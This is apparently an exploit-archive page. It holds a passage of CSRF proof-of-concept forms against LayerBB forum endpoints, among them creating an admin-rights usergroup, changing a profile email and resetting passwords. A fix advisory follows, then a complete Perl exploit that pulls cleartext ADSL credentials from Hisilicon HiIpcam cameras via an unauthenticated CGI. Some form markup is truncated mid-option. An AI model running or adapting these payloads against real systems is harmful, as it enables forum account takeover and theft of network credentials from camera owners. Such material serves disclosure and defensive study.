<label for="labels">Labels</label> <small>Each Line is a new label. HTML enabled.</small>
<textarea name="labels" id="labels" class="form-control"></textarea><br>
<input type="submit" name="create" value="Create Node" class="btn btn-default">
</form>
<!-- New Node CSRF End -->

<!-- New Usergroup CSRF -->
<form action="http://localhost/admin/new_usergroup.php" method="POST" style="padding: 25px;">
<!-- CSRF PoC (admin area): POSTs g_name, g_style, permissions[] and is_staff to
     /admin/new_usergroup.php with no anti-CSRF token. This is the highest-impact
     form in the set: permissions[] value 5 is labelled access_administration, so a
     forged submission can create a staff group with administrative rights. Moving an
     account into that group is a separate step not shown on this page. -->
<label for="g_name">Name</label>
<input type="text" name="g_name" id="g_name" class="form-control">
<label for="g_style">Style <small><code>%username%</code> will be replaced with the user's username.</small></label>
<textarea name="g_style" id="g_style" class="form-control"><span>%username%</span></textarea>
<label for="permissions">Permissions</label><br>
<input type="checkbox" name="permissions[]" value="1"> view_forum<br><input type="checkbox" name="permissions[]" value="2"> create_thread<br><input type="checkbox" name="permissions[]" value="3"> reply_thread<br><input type="checkbox" name="permissions[]" value="4"> access_moderation<br><input type="checkbox" name="permissions[]" value="5"> access_administration<br>
<br>
<input type="checkbox" name="is_staff" value="1"> This Usergroup is staff.
<br>
<input type="submit" name="new" value="Create Usergroup" class="btn btn-default">
</form>
<!-- New Usergroup CSRF End -->

<!-- Profile Fields CSRF -->
<form method="POST" action="http://localhost/admin/profile_fields.php" style="padding: 25px;">
<!-- CSRF PoC (admin area): renames the profile field with id=1 to "discord" via a
     POST to /admin/profile_fields.php (fields: id, title, savechange). No anti-CSRF
     token is sent. Low impact on its own; included for completeness of the affected
     admin endpoints. -->
<input type="hidden" name="id" value="1">
<div class="form-group">
<label for="title">Title</label>
<input type="text" class="form-control" id="title" name="title" value="discord">
</div>
<button type="submit" name="savechange" id="savechange" class="btn btn-primary">Save Changes</button>
</form>
<!-- Profile Fields CSRF End -->

<!-- Sidebar CSRF -->
<form method="POST" action="http://localhost/admin/sidebar.php" style="padding: 25px;">
<!-- CSRF PoC (admin area): overwrites sidebar block id=1 through /admin/sidebar.php
     (fields: id, title, content, style, glyphicon, order, savechange), no anti-CSRF
     token. The seeded content is raw HTML, which suggests the sidebar renders admin
     markup unescaped; if so, a forged request lets an attacker place arbitrary
     markup on every page. That rendering behaviour is not shown here -- confirm. -->
<input type="hidden" name="id" value="1">
<div class="form-group">
<label for="title">Title</label>
<input type="text" class="form-control" id="title" name="title" value="Demo Information">
</div>
<div class="form-group">
<label for="content">Content</label>
<textarea class="form-control" name="content" id="content" style="min-height:250px;"><div class="alert alert-danger" role="alert"> This is the LayerBB Demo Website, you can login using<br /><br /> User: Administrator <br />Pass: admin (Case sensitive)<br /><br />This demo gets refreshed every 24-hours.</div></textarea>
</div>
<div class="form-group">
<label for="style">Style</label>
<select class="form-control" id="style" name="style">
<option value="danger">Current - Do Not Change</option>
<option value="primary">Primary</option>
<option value="success">Success</option>
<option value="info">Info</option>
<option value="warning">Warning</option>
<option value="danger">Danger</option></select>
</div>
<div class="form-group">
<label for="glyphicon">Glyphicon (Optional)</label>
<input type="text" class="form-control" id="glyphicon" name="glyphicon" value="alert">
</div>
<div class="form-group">
<label for="order">Order</label>
<input type="text" class="form-control" id="order" name="order" value="1">
</div>
<button type="submit" name="savechange" id="savechange" class="btn btn-primary">Save Changes</button>
</form>
<!-- Sidebar CSRF End -->

<!-- Edit Threads/Posts CSRF -->
<form id="LAYER_form" action="http://localhost/edit.php/post/1" method="POST" style="padding: 25px;">
<!-- CSRF PoC (user level): rewrites the title and content of post 1 (the id is taken
     from the URL path) via POST to /edit.php/post/1, no anti-CSRF token. Presumably
     only succeeds when the victim's session is allowed to edit that post. -->
<input id="title" name="title" type="text" value="test"><br>
<textarea id="editor" name="content" style="width: 100%; height: 300px; max-width: 100%; min-width: 100%;">test post</textarea>
<br>
<input type="submit" name="edit" value="Edit Post">
</form>
<!-- Edit Threads/Posts CSRF End -->

<!-- New Threads/Posts CSRF -->
<form id="LAYER_form" action="http://localhost/new.php/node/1" method="POST" style="padding: 25px;">
<!-- CSRF PoC (user level): creates a thread in node 1 through POST /new.php/node/1
     (fields: title, content, create, plus the optional poll fields question,
     answer_1, answer_2), no anti-CSRF token. The "Add an answer field" button calls
     plus(), which is not defined anywhere in this listing, so it is inert here. -->
<input type="text" name="title" placeholder="Thread Title..." style="width:100%;" class="col-sm-9 form-control">
<div class="clearfix"></div>
<br>
<textarea id="editor" style="width: 100%; height: 300px; max-width: 100%;" name="content"></textarea>

<div class="center-block" style="margin-top:5px;">
<input type="submit" name="create" value="Create Thread">
</div>

<br>
<ul class="nav nav-tabs">
<li class="active"><a href="#polls" data-toggle="tab">Polls</a></li>
</ul>
<div class="tab-content">
<div class="tab-pane active" id="polls">
<div class="col-md-6">
<label for="question">Question</label>
<input type="text" name="question">
<label for="answer_1">1. Answer</label>
<input type="text" name="answer_1" id="answer_1">
<label for="answer_2">2. Answer</label>
<input type="text" name="answer_2" id="answer_2">
<span class="btn btn-primary btn-xs" href="" onclick="plus();"> Add an answer field </span>
</div>
</div>
</div>
</form>
<!-- New Threads/Posts CSRF End -->

<!-- Thread Reply CSRF -->
<form id="LAYER_form" action="http://localhost/reply.php/test.1" method="POST" style="padding: 25px;">
<!-- CSRF PoC (user level): posts a reply to the thread addressed as "test.1" (slug
     and id in the URL path) via POST /reply.php/test.1 with fields content and
     reply, no anti-CSRF token. -->
<textarea id="editor" style="width: 100%; height: 300px;" name="content"></textarea>
<p class="pull-right" style="margin-top:5px;">
<input type="submit" name="reply" value="Post Reply">
</p>
</form>
<!-- Thread Reply CSRF End -->

<!-- PM Reply CSRF -->
<form id="%form_id%" action="http://localhost/conversations.php/cmd/reply/id/1" method="POST" style="padding: 25px;">
<!-- CSRF PoC (user level): replies to private conversation id 1 via
     POST /conversations.php/cmd/reply/id/1 (fields: content, reply), no anti-CSRF
     token. The id="%form_id%" is an unsubstituted placeholder copied from the
     application template; it has no effect on the request. -->
<textarea id="editor" style="width: 100%; height: 300px;" name="content"></textarea>
<p class="pull-right" style="margin-top:5px;">
<input type="submit" name="reply" value="Post Reply">
</p>
</form>
<!-- PM Reply CSRF End -->

<!-- Report Post CSRF -->
<form action="http://localhost/report.php/post/1" id="LAYER_form" method="POST" style="padding: 25px;">
<!-- CSRF PoC (user level): files a report against post 1 through POST /report.php/post/1
     (fields: reason, report), no anti-CSRF token. Nuisance-level impact (spurious
     moderation reports attributed to the victim). -->
<label for="reason">Reason</label>
<textarea name="reason" style="height:150px;width:100%;min-width:100%;max-width:100%;"></textarea>
<br>
<input type="submit" name="report" value="Report">
</form>
<!-- Report Post CSRF End -->

<!-- Edit Profile CSRF -->
<form id="LAYER_form" action="http://localhost/profile.php/cmd/edit" method="POST" style="padding: 25px;">
<!-- CSRF PoC (user level): rewrites the victim's profile through POST /profile.php/cmd/edit
     (fields: email, usermsg, gender, timezone, location, birthday, about, edit), no
     anti-CSRF token. The email field is the one that matters: the forgot-password
     flow further down sends its mail to the address on file, so changing it is a
     plausible step towards account takeover -- that chain is inferred, not shown here.
     NOTE(review): the timezone and location <select> lists below are truncated in this
     listing (they end mid-option and are never closed), so this form is not valid
     markup as reproduced; trim the two selects to a single option before use. -->
<label for="email">Email</label>
<input type="text" name="email" id="email" value="demo@layerbb.com">
<label for="usermsg">User Message</label>
<input type="text" name="usermsg" id="usermsg" value="User">
<label for="gender">Gender</label>
<select id="gender" name="gender"><option value="0" selected="selected">Not telling</option>
<option value="1">Female</option>
<option value="2">Male</option></select>
<label for="timezone">Timezone</label>
<select id="timezone" name="timezone"><option value="Pacific/Midway">(UTC-11:00) Midway Island</option><option value="Pacific/Samoa">(UTC-11:00) Samoa</option><option value="Pacific/Honolulu">(UTC-10:00) Hawaii</option><option value="US/Alaska">(UTC-09:00) Alaska</option><option value="America/Los_Angeles">(UTC-08:00) Pacific Time (US & Canada)</option><option value="America/Tijuana">(UTC-08:00) Tijuana</option><option value="US/Arizona">(UTC-07:00) Arizona</option><option value="America/Chihuahua">(UTC-07:00) Chihuahua</option><option value="America/Chihuahua">(UTC-07:00) La Paz</option><option value="America/Mazatlan">(UTC-07:00) Mazatlan</option><option value="US/Mountain">(UTC-07:00) Mountain Time (US & Canada)</option><option value="America/Managua">(UTC-06:00) Central America</option><option value="US/Central" selected="selected">(UTC-06:00) Central Time (US & Canada)</option><option value="America/Mexico_City">(UTC-06:00) Guadalajara</option><option value="America/Mexico_City">(UTC-06:00) Mexico City</option><option value="America/Monterrey">(UTC-06:00) Monterrey</option><option value="Canada/Saskatchewan">(UTC-06:00) Saskatchewan</option><option value="America/Bogota">(UTC-05:00) Bogota</option><option value="US/Eastern">(UTC-05:00) Eastern Time (US & Canada)</option><option value="US/East-Indiana">(UTC-05:00) Indiana (East)</option><option value="America/Lima">(UTC-05:00) Lima</option><option value="America/Bogota">(UTC-05:00) Quito</option><option value="Canada/Atlantic">(UTC-04:00) Atlantic Time (Canada)</option><option value="America/Caracas">(UTC-04:30) Caracas</option><option value="America/La_Paz">(UTC-04:00) La Paz</option><option value="America/Santiago">(UTC-04:00) Santiago</option><option value="Canada/Newfoundland">(UTC-03:30) Newfoundland</option><option value="America/Sao_Paulo">(UTC-03:00) Brasilia</option><option value="America/Argentina/Buenos_Aires">(UTC-03:00) Buenos Aires</option><option value="America/Argentina/Buenos_Aires">(UTC-03:00) 
Georgetown</option><option value="America/Godthab">(UTC-03:00) Greenland</option><option value="America/Noronha">(UTC-02:00) Mid-Atlantic</option><option value="Atlantic/Azores">(UTC-01:00) Azores</option><option value="Atlantic/Cape_Verde">(UTC-01:00) Cape Verde Is.</option><option value="Africa/Casablanca">(UTC+00:00) Casablanca</option><option value="Europe/London">(UTC+00:00) Edinburgh</option><option value="Etc/Greenwich">(UTC+00:00) Greenwich Mean Time : Dublin</option><option value="Europe/Lisbon">(UTC+00:00) Lisbon</option><option value="Europe/London">(UTC+00:00) London</option><option value="Africa/Monrovia">(UTC+00:00) Monrovia</option><option value="UTC">(UTC+00:00) UTC</option><option value="Europe/Amsterdam">(UTC+01:00) Amsterdam</option><option value="Europe/Belgrade">(UTC+01:00) Belgrade</option><option value="Europe/Berlin">(UTC+01:00) Berlin</option><option value="Europe/Berlin">(UTC+01:00) Bern</option><option value="Europe/Bratislava">(UTC+01:00) Bratislava</option><option value="Europe/Brussels">(UTC+01:00) Brussels</option><option value="Europe/Budapest">(UTC+01:00) Budapest</option><option value="Europe/Copenhagen">(UTC+01:00) Copenhagen</option><option value="Europe/Ljubljana">(UTC+01:00) Ljubljana</option><option value="Europe/Madrid">(UTC+01:00) Madrid</option><option value="Europe/Paris">(UTC+01:00) Paris</option><option value="Europe/Prague">(UTC+01:00) Prague</option><option value="Europe/Rome">(UTC+01:00) Rome</option><option value="Europe/Sarajevo">(UTC+01:00) Sarajevo</option><option value="Europe/Skopje">(UTC+01:00) Skopje</option><option value="Europe/Stockholm">(UTC+01:00) Stockholm</option><option value="Europe/Vienna">(UTC+01:00) Vienna</option><option value="Europe/Warsaw">(UTC+01:00) Warsaw</option><option value="Africa/Lagos">(UTC+01:00) West Central Africa</option><option value="Europe/Zagreb">(UTC+01:00) Zagreb</option><option value="Europe/Athens">(UTC+02:00) Athens</option><option value="Europe/Bucharest">(UTC+02:00) 
Bucharest</option><option value="Africa/Cairo">(UTC+02:00) Cairo</option><option value="Africa/H
<br>
<label for="location">Location</label>
<select id="location" name="location"><option value="--" selected="selected">Nothing selected</option><option value="AD">Andorra</option><option value="AE">United Arab Emirates</option><option value="AF">Afghanistan</option><option value="AG">Antigua and Barbuda</option><option value="AI">Anguilla</option><option value="AL">Albania</option><option value="AM">Armenia</option><option value="AO">Angola</option><option value="AQ">Antarctica</option><option value="AR">Argentina</option><option value="AS">American Samoa</option><option value="AT">Austria</option><option value="AU">Australia</option><option value="AW">Aruba</option><option value="AX">Aland Islands</option><option value="AZ">Azerbaijan</option><option value="BA">Bosnia and Herzegovina</option><option value="BB">Barbados</option><option value="BD">Bangladesh</option><option value="BE">Belgium</option><option value="BF">Burkina Faso</option><option value="BG">Bulgaria</option><option value="BH">Bahrain</option><option value="BI">Burundi</option><option value="BJ">Benin</option><option value="BL">Saint Barthélemy</option><option value="BM">Bermuda</option><option value="BN">Brunei Darussalam</option><option value="BO">Bolivia</option><option value="BQ">Bonaire</option><option value="BR">Brazil</option><option value="BS">Bahamas</option><option value="BT">Bhutan</option><option value="BV">Bouvet Island</option><option value="BW">Botswana</option><option value="BY">Belarus</option><option value="BZ">Belize</option><option value="CA">Canada</option><option value="CC">Cocos Islands</option><option value="CD">Congo (the Democratic Republic)</option><option value="CF">Central African Republic</option><option value="CG">Congo</option><option value="CH">Switzerland</option><option value="CI">Cote d'Ivoire</option><option value="CK">Cook Islands</option><option value="CL">Chile</option><option value="CM">Cameroon</option><option value="CN">China</option><option value="CO">Colombia</option><option value="CR">Costa 
Rica</option><option value="CU">Cuba</option><option value="CV">Cabo Verde</option><option value="CW">Curacao</option><option value="CX">Christmas Island</option><option value="CY">Cyprus</option><option value="CZ">Czech Republic</option><option value="DE">Germany</option><option value="DJ">Djibouti</option><option value="DK">Denmark</option><option value="DM">Dominica</option><option value="DO">Dominican Republic</option><option value="DZ">Algeria</option><option value="EC">Ecuador</option><option value="EE">Estonia</option><option value="EG">Egypt</option><option value="EH">Western Sahara</option><option value="ER">Eritrea</option><option value="ES">Spain</option><option value="ET">Ethiopia</option><option value="FI">Finland</option><option value="FJ">Fiji</option><option value="FK">Falkland Islands</option><option value="FM">Micronesia</option><option value="FO">Faroe Islands</option><option value="FR">France</option><option value="GA">Gabon</option><option value="GB">United Kingdom</option><option value="GD">Grenada</option><option value="GE">Georgia</option><option value="GF">French Guiana</option><option value="GG">Guernsey</option><option value="GH">Ghana</option><option value="GI">Gibraltar</option><option value="GL">Greenland</option><option value="GM">Gambia</option><option value="GN">Guinea</option><option value="GP">Guadeloupe</option><option value="GQ">Equatorial Guinea</option><option value="GR">Greece</option><option value="GS">South Georgia and the South Sandwich Islands</option><option value="GT">Guatemala</option><option value="GU">Guam</option><option value="GW">Guinea-Bissau</option><option value="GY">Guyana</option><option value="HK">Hong Kong</option><option value="HM">Heard Island and McDonald Islands</option><option value="HN">Honduras</option><option value="HR">Croatia</option><option value="HT">Haiti</option><option value="HU">Hungary</option><option value="ID">Indonesia</option><option value="IE">Ireland</option><option 
value="IL">Israel</option><option value="IM">Isle of Man</option><option value="IN">India</option><option value="I
<br>
<label for="birthday">Birthday</label>
<input type="text" name="birthday" id="birthday" value="0000-00-00">
<span id="helpBlock" class="help-block">In the format of: YYYY-MM-DD</span>
<label for="editor">About You</label><br>
<textarea name="about" id="editor" style="min-width: 100%; max-width: 100%; height: 150px;"></textarea>
<br>
<div class="panel panel-default">
<div class="panel-heading">Additional Profile Fields</div>
<div class="panel-body"></div>
</div>
<br>
<input type="submit" name="edit" value="Save Changes">
</form>
<!-- Edit Profile CSRF End -->

<!-- Edit Signature CSRF -->
<form id="LAYER_form" action="http://localhost/profile.php/cmd/signature" method="POST" style="padding: 25px;">
<!-- CSRF PoC (user level): replaces the victim's signature via POST
     /profile.php/cmd/signature (fields: sig, edit), no anti-CSRF token. A signature
     is shown under every post, so whatever content the forum allows here is
     propagated forum-wide. -->
<label for="sig">Signature</label>
<textarea name="sig" id="editor" style="width: 100%; height: 300px; max-width: 100%; min-width: 100%;"></textarea>
<br><br>
<input type="submit" name="edit" value="Save Changes">
</form>
<!-- Edit Signature CSRF End -->

<!-- Change Password CSRF -->
<form id="LAYER_form" action="http://localhost/profile.php/cmd/password" method="POST" style="padding: 25px;">
<!-- CSRF PoC: POST /profile.php/cmd/password with current_password, new_password
     and edit, no anti-CSRF token. Note the current_password field: a cross-site
     attacker does not know it, so this form only leads to a password change if the
     server fails to verify that field -- which this page does not demonstrate.
     Treat this one as "token missing", not as a proven takeover. -->
<label for="current_password">Current Password</label>
<input type="password" name="current_password" id="current_password">
<label for="new_password">New Password</label>
<input type="password" name="new_password" id="new_password">
<br><br>
<input type="submit" name="edit" value="Save Changes">
</form>
<!-- Change Password CSRF End -->

<!-- Forgot Password CSRF -->
<form action="http://localhost/members.php/cmd/forgotpassword" method="POST" id="LAYER_form" style="padding: 25px;">
<!-- CSRF PoC (pre-auth): POST /members.php/cmd/forgotpassword with an attacker-chosen
     email and the forget field, no anti-CSRF token. On its own this only triggers a
     reset mail to that address; its value is as a building block (e.g. after the
     profile-edit form above has changed the victim's address). -->
<label for="email">Email</label>
<input type="text" name="email" id="email" class="form-control">
<br><br>
<input type="submit" name="forget" value="Send Email" class="btn btn-default">
</form>
<!-- Forgot Password CSRF End -->

<!-- Reset Password CSRF -->
<form action="http://localhost/members.php/cmd/resetpassword" method="POST" id="LAYER_form" style="padding: 25px;">
<!-- CSRF PoC: POST /members.php/cmd/resetpassword with password, a_password and
     reset, no anti-CSRF token. Neither the action URL nor the fields carry a reset
     token or key, so which account this endpoint acts on (and whether it works
     without a prior reset-link click) is not shown here -- confirm on the target
     before counting it as exploitable. -->
<label for="password">Password</label>
<input type="password" name="password" id="password" class="form-control">
<label for="a_password">Confirm Password</label>
<input type="password" name="a_password" id="a_password" class="form-control">
<br><br>
<input type="submit" name="reset" value="Reset Password" class="btn btn-default">
</form>
<!-- Reset Password CSRF End -->

<!-- Register Account CSRF -->
<form action="http://localhost/members.php/cmd/register" method="POST" style="padding: 25px;">
<!-- CSRF PoC (pre-auth): POST /members.php/cmd/register with username, password,
     a_password, email, LayerBB_captcha and register, no anti-CSRF token. The captcha
     image is served from the target and tied to the viewer's session, so the value
     cannot be pre-filled by a third party; as a CSRF this form is of limited use and
     is included mainly to document the missing token. -->
<label for="username">Username</label>
<input type="text" name="username" value="" id="username" class="form-control">
<label for="password">Password</label>
<input type="password" name="password" id="password" class="form-control">
<label for="a_password">Confirm Password</label>
<input type="password" name="a_password" id="a_password" class="form-control">
<label for="email">Email</label>
<input type="text" name="email" value="" id="email" class="form-control">
<label for="LayerBB_captcha">Are you a bot?</label><br>
<img src="http://localhost/public/img/captcha.php" alt="LayerBB Captcha"><br><input type="text" id="LayerBB_captcha" name="LayerBB_captcha">
<br><br>
<input type="submit" name="register" value="Register" class="btn btn-default">
By clicking "Register", you agree to abide by the forum rules located <a href="http://localhost/members.php/cmd/rules">here</a>.
</form>
<!-- Register Account CSRF End -->



3. Solution:
Update LayerBB to version 1.1.4.

Hisilicon HiIpcam V100R003 Remote ADSL Credential Disclosure


Hisilicon HiIpcam V100R003 suffers from a remote credential disclosure vulnerability.


MD5 | a331e0a4a6311b41063fcdc8715612bb

#!/usr/bin/perl -w
#
# Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# # [
# # [ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
# # [ =============================================================
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [
# # [ Disclaimer:
# # [ This or previous programs are for Educational purpose
# # [ ONLY. Do not use it without permission. The usual
# # [ disclaimer applies, especially the fact that Todor Donev
# # [ is not liable for any damages caused by direct or
# # [ indirect use of the information or functionality provided
# # [ by these programs. The author or any Internet provider
# # [ bears NO responsibility for content or misuse of these
# # [ programs or any derivatives thereof. By using these programs
# # [ you accept the fact that any damage (dataloss, system crash,
# # [ system compromise, etc.) caused by the use of these programs
# # [ are not Todor Donev's responsibility.
# # [
# # [ Use them at your own risk!
# # [
# # [ Initializing the browser
# # [ Server: thttpd/2.25b 29dec2003
# # [ The target is vulnerable
# # [
# # [ Directory Traversal   (note: the list below is thttpd's auto-generated index of /cgi-bin/, i.e. an exposed directory listing, not path traversal)
# # [
# # [ /cgi-bin/..
# # [ /cgi-bin/adsl_init.cgi
# # [ /cgi-bin/chkwifi.cgi
# # [ /cgi-bin/ddns_start.cgi
# # [ /cgi-bin/getadslattr.cgi
# # [ /cgi-bin/getddnsattr.cgi
# # [ /cgi-bin/getinetattr.cgi
# # [ /cgi-bin/getinterip.cgi
# # [ /cgi-bin/getnettype.cgi
# # [ /cgi-bin/getupnp.cgi
# # [ /cgi-bin/getwifi.cgi
# # [ /cgi-bin/getwifiattr.cgi
# # [ /cgi-bin/ptzctrldown.cgi
# # [ /cgi-bin/ptzctrlleft.cgi
# # [ /cgi-bin/ptzctrlright.cgi
# # [ /cgi-bin/ptzctrlup.cgi
# # [ /cgi-bin/ptzctrlzoomin.cgi
# # [ /cgi-bin/ptzctrlzoomout.cgi
# # [ /cgi-bin/ser.cgi
# # [ /cgi-bin/setadslattr.cgi
# # [ /cgi-bin/setddnsattr.cgi
# # [ /cgi-bin/setinetattr.cgi
# # [ /cgi-bin/setwifiattr.cgi
# # [ /cgi-bin/testwifi.cgi
# # [ /cgi-bin/upnp_start.cgi
# # [ /cgi-bin/upnp_stop.cgi
# # [ /cgi-bin/wifi_start.cgi
# # [ /cgi-bin/wifi_stop.cgi
# # [
# # [ File Reading   (note: an unauthenticated GET /cgi-bin/getadslattr.cgi; the lines below are the camera's ADSL/PPPoE account returned in cleartext)
# # [
# # [ var ip = "" ;
# # [ var adslenable = "" ;
# # [ var username = "hacker" ;
# # [ var password = "133337" ;
# # [ var dnsauto = "1" ;
# # [ var dns1 = "8.8.8.8" ;
# # [ var dns2 = "8.8.4.4" ;
#
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
# Unbuffered STDOUT so each "[ ..." progress line appears as soon as it is printed.
$| = 1;

# Base URL of the camera's web interface (scheme://host[:port]/), taken from the
# single command-line argument. The default is only a placeholder LAN address.
my $host = shift(@ARGV) || 'https://192.168.1.1/';

# ANSI escapes: clear the terminal, then home the cursor to row 0, column 0.
print "\e[2J", "\e[0;0H";

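# Start-up banner. The original shipped this as a single ~3.5 KB "\xNN"-escaped
# string, which (a) nobody can review by eye -- an opaque hex blob in an exploit
# script is exactly where something malicious would hide -- and (b) had been
# line-wrapped in the middle of a "\x20" escape, so Perl parsed "\x" + newline
# + "20" instead of a space. The lines below are the decoded text, byte for
# byte: the trailing spaces and the doubled spaces inside the quotes are
# deliberate, they were present in the original output.
my $banner_title = 'Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure';
my $banner = join "\n",
    '[ ',
    "[ $banner_title",
    '[ ' . ('=' x length($banner_title)),
    '[ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>',
    '[',
    '[  Disclaimer:',
    '[  This or previous programs are for Educational purpose',
    '[  ONLY. Do not use it without permission. The usual ',
    '[  disclaimer applies, especially the fact that Todor Donev',
    '[  is not liable for any damages caused by direct or ',
    '[  indirect use of the  information or functionality provided',
    '[  by these programs. The author or any Internet provider ',
    '[  bears NO responsibility for content or misuse of these ',
    '[  programs or any derivatives thereof. By using these programs ',
    '[  you accept the fact that any damage (dataloss, system crash, ',
    '[  system compromise, etc.) caused by the use  of these programs',
    "[  are not Todor Donev's responsibility.",
    '[   ',
    '[ Use them at your own risk!',
    "[\n";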

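print $banner;

# Usage guard: the single argument must be an absolute http(s) URL.
print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);

# Strip trailing slashes once so "$base/cgi-bin/" never turns into "//cgi-bin/"
# (the default host value ends with "/", and users commonly pass one too).
(my $base = $host) =~ s{/+\z}{};

print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");

# verify_hostname => 0 is needed because these cameras present self-signed
# certificates, but it also means this tool will happily talk to anyone on the
# path who impersonates the target. Acceptable for a lab PoC; do not copy this
# into anything that handles real credentials afterwards.
my $browser = LWP::UserAgent->new(
    protocols_allowed => ['http', 'https'],
    ssl_opts          => { verify_hostname => 0 },
);
$browser->timeout(30);
$browser->agent($user_agent);

# Issue one GET and return the HTTP::Response. LWP never returns undef here
# (the original "or die" could never fire): a connection or TLS failure comes
# back as a synthetic 5xx carrying a "Client-Warning: Internal response" header.
my $fetch = sub {
    my ($url) = @_;
    my $request = HTTP::Request->new(
        GET => $url,
        [ Content_Type => "application/x-www-form-urlencoded", Referer => $host ],
    );
    return $browser->request($request);
};

my $response = $fetch->("$base/cgi-bin/");
die "[ Exploit Failed: ", $response->status_line, "\n"
    if $response->header('Client-Warning');
print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401');
print "[ Server: ", ($response->header('Server') // 'unknown'), "\n";

# Fingerprint: thttpd's auto-generated directory index for /cgi-bin/. Match on
# the body only; the original matched the whole serialised response, headers
# included, which worked but only by accident.
my $index = $response->decoded_content // '';
if ($index =~ m{<H2>Index of /cgi-bin/</H2>}) {
    print "[ The target is vulnerable\n";
    # Output label kept for compatibility with the original tool; strictly this
    # is an exposed directory listing of /cgi-bin/, not a path-traversal bug.
    print "[\n[ Directory Traversal\n";
    my $tree = HTML::TreeBuilder->new_from_content($index);
    print "[ ", ($_->attr('href') // ''), "\n" for $tree->look_down(_tag => 'a');
    $tree->delete;    # HTML::Element trees are self-referential; free them explicitly

    # getadslattr.cgi answers an unauthenticated GET with the ADSL/PPPoE account
    # as JavaScript assignments ("var username = ..."; "var password = ...").
    # That output is cleartext credential material: keep it out of shared logs
    # and shell history, and handle it like any other captured secret.
    my $creds = $fetch->("$base/cgi-bin/getadslattr.cgi");
    print "[\n[ File Reading\n";
    if ($creds->is_success) {
        print "[ $_\n" for split /\n/, ($creds->decoded_content // '');
    } else {
        print "[ getadslattr.cgi request failed: ", $creds->status_line, "\n";
    }
} else {
    print "[ Exploit failed! The target isn't vulnerable\n";
    exit;
}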
